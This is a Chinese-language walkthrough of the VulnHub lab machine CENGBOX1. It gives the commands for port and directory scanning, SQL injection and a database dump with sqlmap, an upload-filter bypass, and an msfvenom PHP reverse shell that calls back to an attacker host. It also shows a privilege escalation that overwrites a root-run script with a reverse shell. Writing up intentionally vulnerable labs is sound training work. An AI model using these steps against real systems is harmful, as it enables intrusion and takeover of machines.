VULNHUB靶机 CENGBOX1
2022-01-27 本文已影响0人
doinb1517
题目描述
desc.png
解题记录
Reconnaissance
使用namp扫描主机
nmap -sT 192.168.1.11
01.png
发现80和22端口开放,尝试访问
02.png
尝试目录爆破
dirsearch -u http://192.168.1.11
dirb http://192.168.1.11 /usr/share/wordlists/dirb/big.txt
扫描出以下几个
http://192.168.1.11/masteradmin
http://192.168.1.11/index.php
直接访问http://192.168.1.11/masteradmin显示403继续扫描该目录下的php后缀的文件
http://192.168.1.11/masteradmin/login.php
http://192.168.1.11/masteradmin/upload.php
访问http://192.168.1.11/masteradmin/login.php,发现登录页面
loginin.png
Execution
直接尝试一下sql注入,直接进入上传页面。再使用sqlmap查看数据库名
login_burp.png
sqlmap -r login.txt --dbs
dbs.png
爆破表
sqlmap -r login.txt -D cengbox --dump
table.png
继续回到上传页面,上传一个php一句话木马,失败,页面左上角有提示,这个提示的颜色和背景色很像,不注意根本看不到,根据提示修改后缀为.ceng上传。
upload_err.png
生成payload,上传成功。
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -o re_shell.ceng
upload_success.png
获取shell,发现用户cengover,使用数据库中发现的密码连接
get_shell.png
find_user.png
尝试连接
cengover.png
发现cengover的flag
cengflag.png
Privilege Escalation
使用pspy提权, Github
pspy.png
找到一个可用的
MD5.png
查看该文件的读写权限,
ls.png
生成反弹shell,写入/opt/md5check.py
msfvenom.png
在msfconsole等待连接即可,得到root权限
root.png